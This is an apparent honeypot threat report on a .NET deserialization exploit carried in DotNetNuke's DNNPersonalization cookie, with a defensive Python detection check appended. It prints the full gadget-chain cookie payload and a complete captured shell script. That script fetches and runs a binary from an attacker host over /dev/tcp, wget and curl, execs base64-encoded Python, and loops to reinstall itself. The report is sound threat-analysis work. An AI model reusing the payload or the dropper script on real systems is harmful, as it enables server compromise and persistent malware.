Honeypot Extraction - Windows .NET Framework

Date of Detection:

2017.12.11

 

Source IP Addresses:

173.212.217.181, 149.255.35.91

 

Attack Raw Pattern:

DNNPersonalization=<profile><item key=\"key\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\"ObjectStateFormatter\" xmlns:p3=\"http://www.w3.org/2001/XMLSchema-instance\" /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1=\"http://www.w3.org/2001/XMLSchema\" p5:type=\"q1:string\" xmlns:p5=\"http://www.w3.org/2001/XMLSchema-instance\">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</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;

 

Target System:

Windows with .NET Framework

 

Malicious File Path from the Exploit:

In some variations of the attack, the exploit downloads malware, executes it, and then deletes the file. This is one of the URLs that host the malware: http://149.255.35.91/larva.sh.

The content of the sh file is as follows.

#!/bin/sh
psarg=""
if [[ -n `ps -lf` ]]; then
 psarg="-lf"
elif [[ -n `ps -au` ]]; then
 psarg="-au"
fi

mutex="21914"
mutex_exist=''
if [[ $psarg ]]; then
 if [[ `ps $psarg | grep -v grep | grep -c $mutex ` -gt 0 ]]; then
 mutex_exist=1
 else
 mutex_exist=''
 fi
fi

if [[ $mutex_exist -gt 0 ]]; then
 echo mutex exist, quiting script
 exit
else
 echo mutex not exist, starting a new one
 sleep 800.$mutex &
fi

sh -c "(cat < /dev/tcp/www.eeme7j.win/23546 > /tmp/mule || wget http://www.eeme7j.win/mule -O /tmp/mule || curl -s http://www.eeme7j.win/mule -o /tmp/mule) && chmod +x /tmp/mule && (nohup /tmp/mule &) && sleep 1 && rm -f /tmp/mule" &
rm -f /tmp/larva.sh

function tcp_download()
{
 FileServer=$1
 Port=$2
 Target=$3
 cat < /dev/tcp/$FileServer/$Port > $Target
}
function http_download()
{
 Url=$1
 Target=$2
 wget $Url -O $Target || curl -s $Url -o $Target
}
function download()
{
 FileServer=$1
 Port=$2
 FileName=$3
 Target=$4
 tcp_download $FileServer $Port $Target || http_download http://$FileServer/$FileName $Target
}
function download_and_execute()
{
 FileServer=$1
 Port=$2
 FileName=$3
 Target=$4
 download $FileServer $Port $FileName $Target
 chmod +x $Target
 nohup $Target &
 sleep 1
 rm -f $Target
}

echo "from subprocess import *;p = Popen('python',stdin=PIPE); p.stdin.write(\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\");" | python

while true; do
 sleep 3600.$mutex &
 sleep 3600.$mutex
 download_and_execute www.eeme7j.win 23547 mule /tmp/mule
 pkill stratum
done

 

Analysis:

First, we Base64-decode the exploit.

The first-stage decoded message is as follows.

DNNPersonalization=<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type="ObjectStateFormatter" xmlns:p3="http://www.w3.org/2001/XMLSchema-instance" /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1="http://www.w3.org/2001/XMLSchema" p5:type="q1:string" xmlns:p5="http://www.w3.org/2001/XMLSchema-instance">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</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;

 

Request Headers:

{"Cookie":"DNNPersonalization=<profile><item key=\"key\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\"ObjectStateFormatter\" xmlns:p3=\"http://www.w3.org/2001/XMLSchema-instance\" /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1=\"http://www.w3.org/2001/XMLSchema\" p5:type=\"q1:string\" xmlns:p5=\"http://www.w3.org/2001/XMLSchema-instance\">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</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;"

 

Second, we decode the encoded message again and find the following pattern in it:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden –encode

This exploit tries to compromise Windows systems and calls powershell.exe to execute arbitrary code. Furthermore, at the time of writing, the exploit cannot be detected by the majority of defensive systems.
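
A detection check for the cookie shown under Request Headers, added here as an example (it is not part of the original capture or of any product's code): it extracts the DNNPersonalization cookie from a Cookie header and flags the type names and the MethodName element seen in the captured request. The function names, the sample headers and the URL-decoding step are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Type names taken from the type="..." attribute of the captured cookie.
GADGET_TYPES = (
    "System.Windows.Data.ObjectDataProvider",
    "System.Web.UI.ObjectStateFormatter",
    "System.Data.Services.Internal.ExpandedWrapper",
)
TYPE_ATTR = re.compile(r'<item\b[^>]*?\btype\s*=\s*"([^"]*)"', re.I)
METHOD = re.compile(r"<MethodName>\s*([^<\s]+)\s*</MethodName>", re.I)

# Constructed samples: a shortened copy of the captured cookie (payload replaced
# by a placeholder, quotes escaped as in the honeypot log) and a benign profile.
SAMPLE_ATTACK = (
    r'lang=en-US; DNNPersonalization=<profile><item key=\"key\" type=\"System.Data.Services.'
    r'Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web],'
    r'[System.Windows.Data.ObjectDataProvider, PresentationFramework]], System.Data.Services\">'
    r'<MethodName>Deserialize</MethodName><anyType>PLACEHOLDER</anyType></item></profile>;'
)
SAMPLE_BENIGN = ('DNNPersonalization=<profile><item key="Usability:Mode" '
                 'type="System.String"><string>View</string></item></profile>')

def personalization_value(cookie_header):
    """Return the normalised DNNPersonalization cookie value, or None."""
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name.lower() == "dnnpersonalization":
            # Undo URL-encoding (assumed) and the log's backslash-escaped quotes.
            return unquote(value).replace('\\"', '"')
    return None

def inspect_cookie(cookie_header):
    """Return findings for one Cookie header; an empty list means clean."""
    value = personalization_value(cookie_header)
    if value is None:
        return []
    findings = []
    for type_attr in TYPE_ATTR.findall(value):
        findings += ["type:" + g for g in GADGET_TYPES
                     if g.lower() in type_attr.lower()]
    match = METHOD.search(value)
    if match:  # the profile names a method to invoke, which a plain setting never does
        findings.append("method:" + match.group(1))
    return findings

if __name__ == "__main__":
    for header in (SAMPLE_ATTACK, SAMPLE_BENIGN):
        print(inspect_cookie(header) or "clean")
```

The type list only covers the names present in this capture, so treat a hit as a tripwire for this pattern rather than complete coverage of the technique.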

 
